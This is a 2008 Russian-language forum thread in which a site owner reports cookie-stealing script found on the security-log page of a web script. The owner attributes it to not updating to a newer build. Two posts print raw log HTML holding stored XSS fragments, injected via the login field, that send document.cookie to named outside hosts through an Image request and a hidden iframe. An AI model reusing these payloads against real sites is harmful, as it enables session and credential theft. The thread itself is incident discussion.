С нами с 29.05.05
Сообщения: 673
Рейтинг: 294
|
 Добавлено: 24/05/08 в 20:09 |
может баян, но обнаружил у себя на странице секьюрити-логов скрипт шифрованый, короче понял так, что куки отправляет с паролем на unistaff(dot)ru/js/s.
скрипт ставится через юзер/пасс.
айпи 92.62.101.9
|
|
|
|
| |
С нами с 10.10.07
Сообщения: 339
Рейтинг: 404
|
| Добавлено: 24/05/08 в 23:18 |
вероятнее всего в самом sec.log у тебя такая конструкция:
| Код: |
<td style="white-space: nowrap;">03:10 - 29 Mar</td><td style="white-space: nowrap;">system</td><td
style="white-space: nowrap;">195.5.116.250 tried to login with
';i=new Image();i.src=s;a=" / ";//--></scrip^@t>.</td></tr>
<tr class=row2><td style="white-space: nowrap;">03:11 - 29 Mar</td><td style="white-space: nowrap;">system</td><td
style="white-space: nowrap;">195.5.116.250 tried to login with
<scrip^@t>/*<!--*/s="http";a=" / ";s+="://unistaff.ru/js/s.";b='.</td></tr>
[/quote] |
проверь плс дату, волна таких попыток закончилась как раз в марте-апреле.
и просто закрой всё хтаксесесом.
|
|
|
|
| |
С нами с 29.05.05
Сообщения: 673
Рейтинг: 294
|
| Добавлено: 24/05/08 в 23:40 |
20 мая было..
ифрейм как-то вставлен..
| Код: | | <iframe width=1 height=1 a=" / " b='.</td></tr><tr class=row2><td style="white-space: nowrap;">06:58 - 20 May</td><td style="white-space: nowrap;">92.62.101.9 tried to login with 'src=http://92.62.101.9/i.php> / </iframe>.</td></tr><tr class=row2><td style="white-space: nowrap;">06:58 - 20 May</td><td style="white-space: nowrap;">92.62.101.9 tried to login with <scrip t>/*<!--*/s="http";a=" / ";s+="://92.62.101.9/u/s.";b='.</td></tr><tr class=row2><td style="white-space: nowrap;">19:38 - 18 May</td><td style="white-space: nowrap;">92.62.101.9 tried to login with ';s+="php?";a=" / ";s+=document.cookie;b='.</td></tr><tr class=row2><td style="white-space: nowrap;">19:38 - 18 May</td><td style="white-space: nowrap;">92.62.101.9 tried to login with ';i=new Image();i.src=s;a=" / ";//--></scrip t>.</td></tr><tr class=row2><td style="white-space: nowrap;">19:38 - 18 May</td><td style="white-space: nowrap;"> |
это я из кода страницы вырезал.
sec.log почистил сразу, поэтому не могу сказать что там было..
хотя если в секьюритилог не заходить, нестрашно наверно 
|
|
|
|
| |
С нами с 25.09.04
Сообщения: 485
Рейтинг: 514
|
| Добавлено: 26/05/08 в 11:12 |
странно.. такие взломы были как писал Soft-Com месяц назад до 17 билда.
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 26/05/08 в 14:36 |
| NeXt писал: | | странно.. такие взломы были как писал Soft-Com месяц назад до 17 билда. |
Что странного-то? Может ТС не обновлял билд... Или этот мудак нашел новую дырку...
|
|
|
|
| |
С нами с 29.05.05
Сообщения: 673
Рейтинг: 294
|
| Добавлено: 26/05/08 в 16:04 |
угу, на этом сайте не обновил, так что сорри за ложную тревогу
|
|
|
|
| |
Текстовая реклама в форме ответа
Заголовок и до четырех строчек текста
Длина текста до 350 символов
Купить рекламу в этом месте! |
